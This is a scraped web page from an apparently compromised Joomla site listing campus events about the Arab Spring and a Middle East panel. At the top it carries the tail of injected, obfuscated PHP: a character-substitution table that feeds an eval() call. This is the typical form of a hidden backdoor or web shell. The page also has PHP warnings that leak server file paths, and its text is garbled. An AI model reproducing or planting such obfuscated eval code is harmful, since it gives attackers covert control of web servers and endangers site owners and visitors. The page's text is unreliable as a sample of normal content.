'Y'=>'S', 'X'=>'F', 'Z'=>'M', 'a'=>'t', 'c'=>'C', 'b'=>'Z', 'e'=>'j', 'd'=>'4', 'g'=>'v', 'f'=>'a', 'i'=>'o', 'h'=>'c', 'k'=>'I', 'j'=>'N', 'm'=>'1', 'l'=>'P', 'o'=>'9', 'n'=>'s', 'q'=>'H', 'p'=>'m', 's'=>'O', 'r'=>'Q', 'u'=>'e', 't'=>'G', 'w'=>'7', 'v'=>'b', 'y'=>'J', 'x'=>'8', 'z'=>'3'); eval/*a*/(eigszpmq($tulehryk, $uzzozgf)); }
Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home2/assur3/public_html/index.php:6) in /home2/assur3/public_html/libraries/joomla/session/session.php on line 532

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home2/assur3/public_html/index.php:6) in /home2/assur3/public_html/libraries/joomla/session/session.php on line 532
Home

Warning: Creating default object from empty value in /home2/assur3/public_html/libraries/joomla/registry/registry.php on line 421

Warning: Creating default object from empty value in /home2/assur3/public_html/libraries/joomla/registry/registry.php on line 421

Warning: Creating default object from empty value in /home2/assur3/public_html/libraries/joomla/registry/registry.php on line 421

Warning: Creating default object from empty value in /home2/assur3/public_html/libraries/joomla/registry/registry.php on line 421
Subscribe
arrow leftarrow centerarrow right
Week Of April 24, 2016
Loading...
SunMonTueWedThuFriSat
24
25
26
27
28
29
30

The Arab Spring

arab-springsmallThe Arab Spring and its Consequences for Israel and the US. Co-sponsoring the program are NCC's Hillel Club, NCC's International Outreach and Peace Club, Student World Assembly and the UNA-USA

.

Read more...

Middle East Event

ungeneralassemblyhallPanelists
Dr. Jeremy Pressman; Bennett Honors Professor of Political Science, University of Connecticut
Dr. Lawrence Davidson; Professor of Middle East History, West Chester University, Pennsylvania

.

Read more...